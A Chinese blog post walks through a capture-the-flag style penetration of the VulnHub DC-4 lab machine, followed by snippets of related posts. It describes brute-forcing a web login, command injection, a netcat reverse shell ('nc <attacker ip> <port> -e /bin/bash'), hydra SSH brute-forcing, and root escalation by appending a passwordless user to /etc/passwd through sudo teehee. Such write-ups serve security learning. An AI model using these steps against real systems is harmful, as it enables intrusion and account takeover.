DC-4靶机渗透测试

已于 2022-07-28 20:35:49 修改
阅读量2.6k 收藏 7
点赞数 1
分类专栏: DC靶机 渗透 文章标签: 安全
于 2022-07-07 22:40:36 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_60463414/article/details/125667202
版权

一、靶机环境搭建

DC: 4 ~ VulnHubhttps://www.vulnhub.com/entry/dc-4,313/点击上方链接,下载DC4.zip并解压,VMware打开虚拟机,找到dc4镜像。

二、使用kali(桥接)工具NMAP扫描物理主机网段。

三、使用NMAP扫描系统为VMware的IP,查看开启的端口。

四、可见开启了http80端口,并访问。

五、发现登录界面,尝试Burpsuite抓包暴力破解。

这里我知道用户名为admin。可见暴力破解显示密码为happy。

 六、使用admin、happy登录。

发现有命令执行 ,抓包尝试修改命令。

 这里默认吧空格转化为+

发现是linux内核,使用linux命令反弹shell 。

七、使用linux命令执行反弹shell

这里我使用nc命令反弹shell(python也可以反弹,purl没有安装不能反弹)。

使用kali监听本地端口。若公网环境也可通过frp进行端口映射。 

bp抓包,使用nc 攻击机ip 攻击端口 -e /bin/bash 命令反弹shell。

(环境有点卡,失败,可重启环境,多尝试几次)

 可见shell反弹成功

使用python 美化界面。

八、提权

 首先尝试了sudo 提权、/etc/passwd提权、计划任务提权、隐藏文件提权,都不行。

但是查看/etc/passwd文件中,发现有三个用户。

接着查home目录中各用户的文件,发现在jim用户的家目录下的/backups/old-passwords.bak文件。

查看文件,发现是一些旧密码,尝试用hydra暴力破解。

设置用户字典

设置密码字典old-password.bak

 

发现jim用户能登录,尝试登录。

登录成功。

尝试各种提权方式都不行,查看文件。 

发现有邮箱,查看邮箱 。

发现charles用户的密码,尝试登录

登录成功。

尝试sudo -l

发现/usr/bin/teehee可执行root权限。

查看teehee --help,可知这条命令类似echo命令,可以把内容输入到文件中。

所以尝试使用/etc/passwd文件提权。

使用teehee命令增加一个用户,使其获得root权限。(把密码一列的x删掉)

至此DC-4靶机提权到root权限,本次渗透到此结束。

水平有限,忘大家海涵。

DC4靶机渗透测试
Huangshanyoumu的博客
04-16 776
文章目录环境版本:一、信息收集1.主机发现2.端口扫描二、漏洞挖掘1.访问目标 ip,查看内容2.使用 BP 进行爆破密码3.使用密码登陆4.使用 BP 查看执行命令流量包5.替换命令来使用 nc 建立连接7.使用 nc 将靶机文件传输到攻击机8.使用 hydra 爆破 ssh 密码9.ssh 登陆,进行信息收集10.提权 描述:从靶机DC-3开始,只有一个入口和一个最终的flag, 只有拿到root权限才可以发现最终的flag,DC-4也是一样 环境版本: VMware pro 16 Kali 202
VulnHub系列 DC-4靶机 渗透详细过程 | 红队打靶
网络空间安全学习
04-17 2456
通过test.sh脚本的提示信息,再加上查看发现的backups目录当中有密码信息,通过我们得到的三个用户名信息,再加上这个密码信息,可以尝试ssh爆破登录,观察是否可成功爆破出ssh用户的登录密码。回到后台,等登录即可,进入后台,发现有命令工具,进入查看,点击run,发现执行了ls -l命令得回显内容,抓包看一下。然后我们再次通过charles用户进行远程登录,成功登录,发现也有邮件,查看一下,并无有用的信息。去往此目录,查看jim文件得内容信息,发现charles发来的邮件,并有连接密码。
DC-4 靶机详解(两个解法版本)
TonyChaoWei的博客
04-11 1226
DC-4 两钟解法
DC-4靶机渗透
weixin_45349299的博客
12-21 1190
开放的端口:22 => ssh服务 ---- OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)80 => http服务 ---- nginx 1.15.10扫描出来的网站目录。
DC-4靶机实战 渗透测试
她叫常玉莹
07-23 474
使用arp-scan查看主机 arp-scan -l 靶机ip地址为192.168.0.151,使用nmap进行扫描 目标机开放了80端口与22端口,使用浏览器访问下80端口 页面是一个表单,抓下包看一下 使用jhon的字典进行爆破 密码为happy登陆一下。 点击command可以运行命令,bp抓下数据包分析下 命令是由radio参数传入的,并且使用“+”代替“ ”(空格)。发送到repeater模块修改radio参数测试一下。 可以看到命令成功执行了,说明这里存在命令注入漏洞。在/home
DC-6靶机渗透测试
m0_66225311的博客
08-05 629
又是一个远古靶机,最近又做了一做,发现可以直接用50110.py文件一把梭获取权限,不需要之前那么繁琐的用html文件来反弹shell了。第一次没能进行尝试,要不然就能搞点不一样的了
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
DC-5靶机渗透测试
最新发布
m0_66225311的博客
08-11 958
远古靶机,心血来潮又打了一次,发现这里的文件包含获取shell的有了更简便的方式,所以重新编辑添加了利用PHP过滤链直接进行文件包含漏洞的RCE的方法,利用php_filter_chain_generator.py工具生成相应的RCE过滤链即可。界面,发现只是一个普通的界面,但是再次访问的时候,发现下面的标识发生了改变,猜测这个界面存在文件包含,通过刷新来随机访问某一个界面。
DC-4靶机进行渗透测试
zll___的博客
03-14 813
DC-4靶机进行渗透测试
DC-4靶机提权超详细过程
02-29
本文将详细介绍如何在DC-4靶机上进行权限提升的过程,包括利用Kali Linux进行初始渗透测试、爆破登录凭证、获取敏感信息以及最终实现权限提升的具体步骤。通过本教程,读者可以学习到网络安全领域中权限提升的基本...
Vulnhub靶机渗透测试——DC-4
Cobra的博客
05-03 1858
一、实验环境 攻击机(kail):192.168.189.148 靶机(ubuntu):192.168.189.183 二、信息收集 1、使用nmap进行主机发现 nmap 192.168.189.0/24 2、发现IP192.168.189.183,再使用nmap对其进行扫描 nmap -sV -A -T4 -p- 192.168.189.183 3、发现其开放80,22端口,访问其80端口,是一个登录框 4、在对其进行SQL注入,目录扫描无果后,果断选择暴力破解..
DC-4靶场搭建及渗透实战详细过程(DC靶场系列)
金 帛的博客
07-28 7214
dc-4靶场详细渗透过程
DC-4靶机渗透测试详细教程
啊醒的博客
05-04 4378
DC-4靶机渗透测试详细教程
DC4靶机渗透测试(个人学习记录)
m0_53806046的博客
03-20 1155
在执行这个命令时,如果你的桌面目录是 `/Users/your_username/Desktop`(这是 macOS 的典型路径),文件 `passwords.txt` 将会被创建或覆盖(如果已存在)在这个位置。在这里,它输出的文本是 `"***** root chmod 4777 /bin/sh"`,这看起来像是一个注释,但由于它后面跟着一个管道(`|`)操作符,实际上它是要传递给后面的程序的输入。3. **`sudo` 命令**:`sudo` 允许普通用户以超级用户(通常是 root)的权限执行命令。
【vulnhub】---DC-4靶机
qq_43168364的博客
08-21 2092
目录 一、实验环境 二、信息收集 三、渗透测试   1、漏洞发现和利用   2、提权 四、总结 一、实验环境 靶机DC-4靶机(192.168.15.152) 攻击机:kali Linux(192.168.15.129) 二、信息收集 主机发现 端口扫描 版本探测和操作系统识别 web指纹识别 网站目录扫描 三、渗透测试 1、漏洞发现和利用 2、提权 四、总结 渗透步骤 渗透思路 ......
DC-1靶机渗透测试攻略及DC-2靶机简介
DC-1靶机渗透测试中,可能会用到的各种技术、工具和概念包括但不限于: - Nmap:一款强大的网络扫描工具,用于发现网络上的设备和开放的端口。 - Metasploit:一个著名的渗透测试平台,包含大量的已知漏洞利用...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值